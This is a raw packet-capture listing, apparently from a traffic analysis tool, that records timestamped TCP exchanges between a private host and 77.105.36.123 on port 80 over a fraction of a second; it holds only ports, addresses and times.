                                                                                                                                                Nov 11, 2024 19:16:51.130739927 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131124020 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131134987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131145954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131158113 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131165028 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131170988 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131182909 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131194115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131201029 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131206036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131217957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131226063 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131230116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131236076 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131243944 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.131263018 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.131285906 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.132070065 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132081985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132093906 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132107019 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132117987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132136106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132138014 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.132148981 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.132170916 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.174288988 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.204540014 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.204602957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.204648972 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228384972 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228426933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228441000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228475094 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228542089 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228602886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228610992 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228619099 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228632927 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228647947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.228652954 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.228693962 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229041100 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229055882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229072094 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229084015 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229094028 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229098082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229124069 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229406118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229449034 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229582071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229595900 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229607105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229618073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229626894 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229630947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229643106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229655027 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.229659081 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.229681015 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230267048 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230281115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230292082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230305910 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230319977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230319977 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230334997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230340958 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230370045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230382919 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230384111 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230396032 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230410099 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.230410099 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.230456114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231137037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231151104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231162071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231175900 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231187105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231184959 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231200933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231210947 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231213093 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231225967 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231242895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231245995 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231256962 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231266975 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.231285095 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231321096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.231321096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232222080 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232239008 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232249022 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232260942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232270956 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232281923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232295036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232295990 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232306957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232319117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232331038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.232342005 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232359886 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.232383966 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.233071089 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233086109 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233095884 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233108044 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233125925 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233139038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233149052 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.233151913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233165026 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233171940 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.233176947 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233191013 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233201981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.233202934 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233216047 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.233236074 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.233263016 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.234108925 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234122992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234133005 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234146118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234158039 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234169960 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234180927 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234184027 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.234194994 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234206915 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234215021 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.234225988 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.234230042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.234270096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.235093117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235109091 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235119104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235131025 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235142946 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235152960 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.235156059 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235172987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235183954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235194921 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.235197067 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235213041 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235217094 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.235224962 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.235255003 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236011982 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236026049 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236037016 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236041069 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236051083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236063004 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236063957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236078024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236090899 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236104012 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236109018 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236121893 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236123085 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236135960 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236146927 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236152887 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236171961 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236186981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236825943 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236840010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236850977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236862898 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236874104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236881971 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236886024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236897945 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236910105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236921072 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236922026 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236934900 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236943007 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.236946106 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236958027 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236969948 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.236990929 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237020969 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237776041 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237788916 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237799883 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237812996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237823009 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237823963 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237835884 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237842083 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237849951 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237862110 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237873077 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237884045 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237888098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237901926 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237914085 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237924099 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237930059 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.237937927 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.237977982 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.238619089 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.238631964 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.238642931 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.238655090 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.238666058 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.238682985 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.238696098 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239125013 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239140987 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239152908 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239165068 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239166975 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239176989 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239188910 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239198923 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239201069 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239213943 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239224911 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239226103 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239238024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239243031 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239250898 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239262104 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239275932 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.239281893 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239300013 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.239326954 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240118980 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240133047 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240144014 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240154982 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240164995 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240170956 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240176916 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240187883 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240194082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240194082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240204096 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240216017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240226984 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240235090 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240241051 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240252018 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240255117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240267038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240277052 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.240288019 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.240333080 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241003036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241017103 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241027117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241039991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241045952 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241050959 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241065025 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241076946 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241087914 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241099119 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241105080 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241111040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241122961 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241133928 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241142988 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241147041 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241159916 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241168022 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241187096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.241971970 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241985083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.241995096 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242007017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242018938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242022038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242032051 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242034912 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242046118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242058992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242070913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242079020 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242083073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242093086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242096901 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242110014 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242124081 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242160082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242803097 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242847919 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.242965937 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242985010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.242995977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243009090 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243016958 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243021011 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243033886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243046999 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243057013 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243066072 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243069887 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.243086100 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.243096113 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.253957033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.254014969 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.254029036 CET804973377.105.36.123192.168.2.4
